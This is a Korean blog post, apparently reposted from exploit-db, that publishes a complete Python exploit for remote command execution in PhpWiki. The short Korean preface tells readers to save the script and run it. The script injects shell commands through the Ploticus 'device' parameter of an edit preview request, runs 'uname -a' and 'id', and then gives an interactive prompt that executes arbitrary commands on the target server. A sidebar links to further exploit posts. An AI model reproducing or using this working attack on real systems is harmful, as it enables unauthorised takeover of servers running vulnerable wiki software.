PhpWiki - Remote Command Execution

보안/웹 2014. 9. 9. 12:37

출처 : www.exploit-db.com


PhpWik의 원격 명령실행 파이선 스크립트 입니다

사용법은 아래 코드를 파이썬 확장자로 저장후 스크립트를 실행하면 됩니다

따로 자세한 설명이 필요없어서 코드만 게시를 합니다.


향후 자세한 설명이나 실행법이 필요한 코드가 있으면 따로 서술 하겠습니다



###############################################################
#    ____                    __                  _ __   _
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / 
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/  
#             /_/ /_/         /_/                    
# Diskovered in Nov/Dec 2011
###############################################################
 
import urllib
import urllib2
import sys
def banner():
    print "     ____                    __                  _ __   _ "
    print "    / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
    print "   / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
    print "  / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
    print " /_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
    print "              /_/ /_/         /_/                     \n"
 
 
def usage():
    banner()
    print " [+] Usage example"
    print " [-] python " + sys.argv[0] + " http://path.to/wiki"
 
if len(sys.argv)< 2:
    usage()
    quit()
 
domain = sys.argv[1]
def commandexec(cmd):
    data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
    cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
    cmd2 = urllib2.urlopen(cmd1)
    output = cmd2.read()
    firstloc = output.find("123:::\n") + len("123:::\n")
    secondloc = output.find("\n:::123")
    return output[firstloc:secondloc]
 
 
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
    cmd = raw_input('Run a command: ')
    if cmd == 'quit':
        print "[-] Hope you had fun :)"
        quit = 1
    if cmd != 'quit':
        print commandexec(cmd)


저작자표시 비영리 변경금지

'보안 > ' 카테고리의 다른 글

WordPress DDOS 공격 분석  (0) 2014.09.30
Bash Vulnerability CVE-2014-6271 Test Tool  (0) 2014.09.26
Bash Environment Variables Code Injection Exploit (CVE-2014-6271)  (0) 2014.09.26
Internet Explorer MS14-029 취약점 코드  (0) 2014.09.21
Http File Server 2.3.x - Remote Command Execution  (0) 2014.09.16
Posted by 비타민A
,

티스토리툴바